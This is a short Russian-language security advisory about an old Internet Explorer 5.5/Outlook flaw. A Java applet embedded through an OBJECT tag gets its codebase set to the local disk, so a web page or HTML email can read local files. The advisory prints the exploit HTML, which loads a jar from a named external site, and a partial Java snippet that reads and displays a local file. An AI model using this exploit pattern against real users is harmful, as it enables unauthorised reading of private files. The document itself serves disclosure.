Детали:

В IE 5.5/Outlook/Outlook Express обнаружена уязвимость, позволяющая читать локальные файлы, произвольные интранет (это не опечатка 🙂 URL'ы и получать структуры локальных директорий после посещения определенной странички или чтения HTML-сообщения.

Причина очередного бага в мелкомягком софте - невозможность определить произвольный апплет, загруженный из <OBJECT> tag и jar-файла. Апплеты могут читать URL'ы из "код-базы" и связываться с хостами той же самой "код-базы".

Код устанавливает "код-базу" апплетов в file:///c:/. Проблема не в Java, и, возможно, не в Microsoft's VM, скорее всего, проблема в том, как "код-база" устанавливается IE.

Exploit:

---------javacodebase1.html------------------------------------------
<OBJECT CLASSID="JAVA:gjavacodebase.class" WIDTH=590>
<PARAM NAME="ARCHIVE" VALUE="http://www.guninski.com/gjavacodebase.jar">
<PARAM NAME="CODEBASE" VALUE="file:///c:/">
<PARAM NAME="URL" VALUE="file:///c:/test.txt">
</OBJECT>
---------------------------------------------------------------------

--------gjavacodebase.java-------------------------------------------
......
  try
   {
      u = new URL(getParameter("URL"));
      InputStream is=u.openStream();
      byte ba[]=new byte[1000];
      int l=is.read(ba);
      InputStream os=u.openConnection().getInputStream();
      String s1=new String(ba,0,l);

      print(u.toString());
      print(s1);
   }
.......
---------------------------------------------------------------------

Решение:
Отключите Java ;).

Демонстрация:
http://www.guninski.com/javacodebase1.html

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии